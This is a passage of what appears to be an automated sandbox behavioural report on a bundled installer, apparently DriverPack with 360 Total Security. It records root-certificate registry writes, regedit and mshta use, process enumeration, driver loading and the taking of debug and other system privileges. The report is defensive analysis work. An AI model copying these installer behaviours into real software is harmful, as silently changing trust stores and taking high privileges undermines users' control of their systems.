Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABB51672400588E6419F1D40878D0403AA20264\Blob = 0b000000010000006c0000004a006100700061006e002000430065007200740069006600690063006100740069006f006e002000530065007200760069006300650073002c00200049006e0063002e0020005300650063007500720065005300690067006e00200052006f006f0074004300410031000000090000000100000016000000301406082b0601050507030406082b06010505070301030000000100000014000000cabb51672400588e6419f1d40878d0403aa2026420000000010000002d030000308203293082021102085f60585f00000000300d06092a864886f70d01010505003057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f74434131301e170d3939303931353135303030315a170d3230303931353134353935395a3057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f7443413130820122300d06092a864886f70d01010105000382010f003082010a028201010094900c4b71291cdaf668797aa4bae7d2cc8dafe84790991fc62aea9763e81fce1757c61ab3a8c77c87ed353580baba6e6dbe17fecc2d1b6cef8a004916e1ee065e4a075dab3dd150b89146d4d4da15d8945c0ecad7dabfa0f7493cc8bbceea26810a142d9c0d37456b41ca578b38f0261f31fccf348e8f77c13fe3ab543c27b4ce324c551362fcfe3a1625cf1b6ba223b7e0ea0269bbf722716d7c0b1993a1979ce391691f68e42f7d106d8f67aec110a2b05e634a97f7e678a9ad26bb54c9dfb4eec59ed325dd136853f98fe8ece5de81d6783eee5040b4013cac15c1823b2e7ff152278b72e0e7dbf98b29c3c34a2b3389ab5c2a07fc7c231e2b4f0822fec10203010001300d06092a864886f70d0101050500038201010055ed6f7b93e545314e68d55581a2081f6cdd09c5781a7057c8df0881ae6677c6750fe4ef498b035c6cff1c90a472b2d31612b206f84686aebfa715db854dfac22d4db3b5b043ef7c7e07db5fb357465176078644fd07eaf1cb4b454d66a73326c4f943aa8d12b3d48d68b6f70279b42d5ad70398042c6999aff4663b64acb2c02bc869549e4c4e48188dce57b53b51e51bd7fa3960db564513bee766d523f67c4800b04cef348d22acb22ed14c38cdfa580306ee3a73870a053acae4afd4c1ee1c857f2516cf27011f848a7708d0d346e820ec9fa48cf1bccdc41236801ec70928afe808bec0d3b23ed72e673da3cebb34fae285cdacce551d455b7885d3857a C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742CDF1594049CBF17A2046CC639BB3888E02E33 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B2BD9031AA6D0E14F4C57FD548258F37B1FB39E4\Blob = 030000000100000014000000b2bd9031aa6d0e14f4c57fd548258f37b1fb39e409000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b060105050703080b000000010000001e0000005300690067006e0065007400200052006f006f00740020004300410000002000000001000000cc050000308205c8308203b0a003020102020101300d06092a864886f70d01010b05003075310b300906035504061302504c31243022060355040a0c1b54656c656b6f6d756e696b61636a6120506f6c736b6120532e412e31273025060355040b0c1e5369676e65742043657274696669636174696f6e20417574686f726974793117301506035504030c0e5369676e657420526f6f74204341301e170d3133303530363131333830345a170d3338303530363131333830345a3075310b300906035504061302504c31243022060355040a0c1b54656c656b6f6d756e696b61636a6120506f6c736b6120532e412e31273025060355040b0c1e5369676e65742043657274696669636174696f6e20417574686f726974793117301506035504030c0e5369676e657420526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100a964cbb831e2b50f802706cc455eea0d5fd7776a9768b65da0780544ab30b07a87ef62ee0858555c17fa2b800e1c75a767764a96c3286b78f95adffa6a79a78a541d2a9686f1b517d55d1a56f74010b70ee107dc670b99a20008d4042277a6438e9fd530aafa9d8146f23dce5ec27ec17c9f33af26da1dde60f782a736ccf5c8c0028f92cf6e4efffbfe613faebfbd9667fed0af1dd623f730e67b885de9f53344ca8abba73b598e7017692817bb1056a5c2b40b0dfbb477891044556d89abd54d32b9d7f7699cfdb5af03b221b62c60f55fd1c254882f60ef9c5486b54107332c6c0b1c12da47996634aea0ec6dd063977fc4058093f8422c54d8feda95186b85f25cf97687361eb1801f40e00b0a93d4ae5a71570d3aefe1ec7b5df8109a377ca916a2c48e573b101b76ada871403385033f6dd81e3de73053c7e3ead7d03055c49a67427cb7406bdca94450f2e32e456271bcb96e28053976f559eaa1033074e0dfb20a23154ee3583aa24f78c8885b5192ce3a2a360fcedfb3024f2efc85aa43d606b578b7c8bb231b458fa73534caaa1437d59f7b30568fe9570a46a701979b2ca74dff593dee9e332c2cf320bb58f8731f01d04322c32817b624001255b85b13bcbfd7d9bd59fbc25369f5ae5226cdac52b7c81d539aa104a00243509d12a9c06e51c1ed114edfefc41421babaa10e95833552d0e79f52d592f922c3870203010001a3633061300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301f0603551d23041830168014507b09af692d2fb5e091af8d92132bb132e849d0301d0603551d0e04160414507b09af692d2fb5e091af8d92132bb132e849d0300d06092a864886f70d01010b050003820201001025a700253dfe8d46d640c72fd95a24854898a3e0d140a1d3a3c0049534217616e9d68b2aa6d136263ec3e5488e6bf806d3c96d208bc1f978872ced7541283e70f9c2716d310c37e015e2db5ef0c0ae5015ec88515383c9a5f2cfacc2e6cc10c76c18775658b5249a870361764f1e58f3db953278112bb12013b17ed2e5e47bb43065038b1be2e8deea12de976a5e0045d6e05b2a90a1d02be8d176496916efdb82b4533248256c74f0caf7cedde1498f52d55415f408af06675398e7acec358a9b13f41dfd81e81b31cef3e08592eb835aceb41789b04ee161705fe8b132ce9b1e0a7b192dc8683633a456f5ba49bd2ffcb30ab26b9a5e3efb4c18af5cf05fd9b1db091d4652c770dbb89829d4396a5e3c62877a8a8f76bfdca768ba8bc539c6094f6f76424ccf00530ab41f58c64a15fdfae1bcb77c54864fbc777924124d645db47adb69367466e87de45b29f230fdb5dddea121616660253b486fceab8f4da24ccb0cfbc136f450c16c2c695c4a441dc45c274d24f74ee13fab6503d3b8917cf08538d68a47442cb00e09a5b2d2f7eaecf475b66b554bc1293ba6449bc210ec7a8e4c1da3a221dc65c6801ed4974ff480530aba5d8d3b7680273a595b1ff55686e1e88a58b79af742ef5aa84aee54fa249e9fb8cceca208e2ac828dd23323c26ee3e4ff99f55c67c5b276221b6d2cf606f78e345122e8f6196abf509a82 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1CBCA5DB2D52A7F693B674DE5F05A1D0C957DF0\Blob = 030000000100000014000000d1cbca5db2d52a7f693b674de5f05a1d0c957df0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b0000000100000014000000550053004500520054007200750073007400000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c02000000001000000930200003082028f30820215a00302010202105c8b99c55a94c5d27156decd8980cc26300a06082a8648ce3d040303308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374204543432043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374204543432043657274696669636174696f6e20417574686f726974793076301006072a8648ce3d020106052b81040022036200041aac545aa9f96823e77ad5246f53c65ad84babc6d5b6d1e67371aedd9cd60c61fddba08903b80514ec57ceee5d3fe221b3cef7d48a79e0a3837e2d97d061c4f199dc259163ab7f30a3b470e2c7a1339cf3bf2e5c53b15fb37d327f8a34e37979a3423040301d0603551d0e041604143ae10986d4cf19c29676744976dce035c663639a300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300a06082a8648ce3d040303036800306502303667a11608dce49700411d4ebee16301cf3baa421164a09d94390211795c7b1dfa64b9ee1642b3bf8ac209c4ece4b14d023100e92a61478c524a4b4e1870f6d644d66ef583ba6d58bd24d95648eaefc4a24681886a3a46d1a99b4dc961dad15d576a18 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\BEB5A995746B9EDF738B56E6DF437A77BE106B81\Blob = 0b000000010000006c00000053002d00540052005500530054002000410075007400680065006e007400690063006100740069006f006e00200061006e006400200045006e006300720079007000740069006f006e00200052006f006f007400200043004100200032003000300035003a0050004e00000009000000010000005e000000305c06082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030606082b0601050507030706082b0601050508020206082b06010505070308060a2b0601040182370a0304030000000100000014000000beb5a995746b9edf738b56e6df437a77be106b8120000000010000007f0400003082047b30820363a0030201020210371918e653547c1ab5b8cb595adb35b7300d06092a864886f70d01010505003081ae310b30090603550406130244453120301e06035504081317426164656e2d577565727474656d626572672028425729311230100603550407130953747574746761727431293027060355040a132044657574736368657220537061726b617373656e205665726c616720476d6248313e303c06035504031335532d54525553542041757468656e7469636174696f6e20616e6420456e6372797074696f6e20526f6f7420434120323030353a504e301e170d3035303632323030303030305a170d3330303632313233353935395a3081ae310b30090603550406130244453120301e06035504081317426164656e2d577565727474656d626572672028425729311230100603550407130953747574746761727431293027060355040a132044657574736368657220537061726b617373656e205665726c616720476d6248313e303c06035504031335532d54525553542041757468656e7469636174696f6e20616e6420456e6372797074696f6e20526f6f7420434120323030353a504e30820122300d06092a864886f70d01010105000382010f003082010a0282010100d9b54ac1d333ead346b3d1e24cd2f5b683d06fd518e993af278e13cdb525365034126429a155e13a60939e28c9e3f39be104b023bf958a8e5b1b417f5ac3e84d4cd524163e8748d427aee6f7531dbb0c00ef3e6171adbf3a7a581f943d5c81d5d56fdfb89bd2f5e5cb837292c253b28202ebadad5f162d925376f189b62cf5c12fe0a74a6fa0306a32eb9a74036878139dca2f9b0b1dbecf750d26979bc7f55e0a9f78dfb3bcec9abaef558f1b9aa6076329175962092a790777a5e0d11769e95bddf690abe2980a00d1256d9ed785872f92f1d176834f0b3a5937282f33a71750d6200b0af426f99f38e72da4b89b898dadadc96a7d8917bbf67f80837ae6ed0203010001a3819230818f30120603551d130101ff040830060101ff020100300e0603551d0f0101ff04040302010630290603551d1104223020a41e301c311a3018060355040313115354526f6e6c696e65312d323034382d35301d0603551d0e041604140fca1e5c79e0a2f329b6d285b30b4ab565ec6b52301f0603551d230418301680140fca1e5c79e0a2f329b6d285b30b4ab565ec6b52300d06092a864886f70d01010505000382010100af01f0ed193c28e84d5cbba5631c883303a70087a41f20abd61ce3061f977e54bdb7d1b2c9d5da80ec17d78af57bc200f6e9116f84a05a2531e289f9a4003f31682ed53de86ee6d51d3c3fb2bd9f77eb9dd38cbac0d7b64dec539c0f046eea356757e30a657b903ae14f3ec300927abb0589738ccba64dc0fbf602d6b007a303c227409f0ce485822daf9a421dd0c78df840ee9d06571cd9a2d88014fee1632d3287d59452963a46c671963df7980eb291aa8fdaf44e24003955e8ad17b9d3342b4aa940cc172a55654174427ef5c0afc893adf2185b3d890cdb473924f8e04cf21fb03d0aca054e89211ae32a99acfc7fa1f10f1b1f3d9e0483dd96d91d3a94 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\67248980DE775D2C9B04E40307940BADB351F395\Blob = 0b000000010000000c00000043004500530041004d000000090000000100000020000000301e06082b0601050507030106082b0601050507030206082b0601050507030403000000010000001400000067248980de775d2c9b04e40307940badb351f3952000000001000000c6030000308203c2308202aaa003020102020101300d06092a864886f70d01010505003048310b30090603550406130246523110300e060355040a0c074e41544958495331173015060355040b0c0e3030303220353432303434353234310e300c06035504030c05434553414d301e170d3039303133303134313933315a170d3139303133303134313933315a3048310b30090603550406130246523110300e060355040a0c074e41544958495331173015060355040b0c0e3030303220353432303434353234310e300c06035504030c05434553414d30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2ac184f006af0eb7444c4f5a3cd07d8935c50d6d3832cf8d67dfe53f587784ced5cde8b8b66899a037ec794120f8ad8bf3d641ec9805f3ced1ae08d0058a116bae33e62c0ad4eae2c5b486768a297f468a9a41d9cc268a0212d23113683a91a40ee20d3b499e398403a0c7fc1709b55cc674ab5c07f452ad12e6ce041fbc37fd544e23613119923733b9dba30c748d4d7a4fccc9c3fa49c53a068948cb1581a5f9fcf793cc4c6dfd95352639e1c48ad996b938881d216fd7742334c64f53dd0ced5d19ee8f79979092dfb3e1f39e9db5a340eea37e9081dad37b976cd9fc9fdf1633285834d96e0e818203715bdf7c5c2add41e4e19cd13da2f4cb251de325f0203010001a381b63081b3300f0603551d130101ff040530030101ff301d0603551d0e0416041470389ecab00deac8cf255380241ae326ce84ff22301f0603551d2304183016801470389ecab00deac8cf255380241ae326ce84ff2230500603551d2004493047304506072a817a01630c0b303a303806082b06010505070201162c68747470733a2f2f636573616d2e6e6174697869732e636f6d2f50432f50435f434553414d5f56312e706466300e0603551d0f0101ff040403020106300d06092a864886f70d0101050500038201010004969c5148da22bac8e65506fdf79a8a8a29c29258b7850788243340aff15a7478eb4133b180d55dbfb697dbe015d322fed934ca2b2e4a0082e23a84282c3a866738f035a73b019c4b6d4ff8f1e18d113a2427317c47ecce4baa4f9987c08b8b855f90cb8103e9a106a260675cd349ad4f81a78305ca0d9d3ece25cb1aa35f6a0558a98f117edf19e3dcf419e86832bc2a04d68aa65a9fa168f8002bc10127a80f0cc4992d3804bccd45b475b027d110d6947b29fc24be6613ad0170e4a6b2991078583e0bf9008349c658b4b70a6850a81a6f28974a2674240342a325e83e35db3ffc647bd70815eeab9004025c65b0559c6a6bf6bd8bd1dc130512801a482f C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\7AC5FFF8DCBC5583176877073BF751735E9BD358 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CC7EA292AF8715D74CA4B415F320154B24F565FD\Blob = 0b000000010000003a00000053006f0075007400680020004100660072006900630061006e00200050006f007300740020004f0066006600690063006500200043004100000009000000010000002a000000302806082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308030000000100000014000000cc7ea292af8715d74ca4b415f320154b24f565fd20000000010000003d0600003082063930820421a003020102020103300d06092a864886f70d01010505003081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203420526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a61301e170d3130303931353030303030305a170d3330303931343030303030305a3081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203420526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a6130820222300d06092a864886f70d01010105000382020f003082020a0282020100dbdced489aa0a39fe0118ed9c892753a55c15122ca0b7aa4350dc5e6572d83f02a6f223837316d7c8524a2062f43823d453040251cee584741e6f09e001ef8f42f11bb92b298452dd31f80c9761413c3cc40e6adeb3960fccfc8df2afd8c1251efcf0c64c657e823515de76652ea66bd937f9d7a28f119706e849f3047b7b0396b132ceb4b4d2eaf3fbffd02134a39e73e33c5109151be0f479d4d52fc2cf3e313a20082e1140ccdd29eb3f2e081dabe999253e37d997743e1e14829819ed605573a71dc3e98ad58706f46bb7e3203e2839b5957f7f8b3cd5416ecb6ada11c1a92d1d4299e8fcdb3e87d50f1c282acbabdb47556a0f5455d187d2c8cf17b41cc86b19a844b0a2a5d9b96e1cdfaab162741e79535a6cb8aa796f3a5cc51f92d7d1e43fbdc6db5b938bd05fb58fa2ed3ec5e642daf58014a7c2246d341cb3de4965e494338bb89ebf49c693912035c84bbe58c1eeae066bbc0bf8cfe9e0a4d3d683f4076d632a9ea45b86a07528ecd51f15d28630cd35938fcc9fd82c94520bce6e8cca20ccb7b6439494645f5731c6a9720eb2142f7b42052b74afd75bccb0f0c6711571ff730f1ab90cc5d3c960562d3ca55014b46c580871c72d0735421ead7a39cd3ae7fd453d928fc57dee53f524abbc8262447531c73bacfc6b430cd5e71c756bc493825e6c5100978d9d41d5ccd6eeddb915ca1531456aa8d27a9a68e1b0203010001a320301e300e0603551d0f0101ff040403020106300c0603551d13040530030101ff300d06092a864886f70d01010505000382020100d10b85d45ea696f0908912d9015308ecf2ed4338893ec12964ee53ff4ffe8b0a0e92f4fd7d2880ce0109fc31d16b5b0389b22e6003e5ef639691295fe03f98f868985563ca4f6b5372bab3621a199ec1131d9982faabaa3380b9f71afc794c02d0e1838b2c782c2f5c3061324fbbd13e955f607655d10e6f794e0ffab875b11ffe0d8b5b8b2842ca4d4563520249cc9d0f5fbb393f619bb15c74439a56c3997f9fc44dc0d38fd7cb5497f5fb487e2782feba63ede86fe384eb693e08f2ca24aa348e6240870dc751d40175dc667affe9ba326f4f8f72356c09ed5b78b0a948fa7c9141b2ac8e313725950c45a5554a19518c55930915c9f440019cb5757caa01feb2694d189a02eb7400fb7b68f4f0c37fa69df4ece842baeb837997fca376195b717f2667e94f2a7bb3cb7ef3fcf5a7bffb3f977575d0cbeb78e3036b8e82d01161fb373da7980b1efe3b5ed9cf00a517e9ecfd0cb5ddb8c6bcbdf3d230ee850e85f952334886e7c6afbfbf0cd04b7040f55ec8553f501c4f07d96776147d660dc2b5caa282340386f8d25ab6129626797a176d98a9ccf9e0cb1a45fff3c00cc562fe13c62dbf6a17ea630d7e3e247e62394e27391b414bc3b1607151fa0982ac0f8dd7d7efde1dab2b51bdf800f3d481c70d981c3dec2fa306c8f55500a73ffd97abb0b54a99590888906c1cb0ffe8ed7c993f2d6aed6d7d6612eed8e031ec C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AB9D58C03F54B1DAE3F7C2D4C6C1EC3694559C37 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\SysWOW64\mshta.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\mshta.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
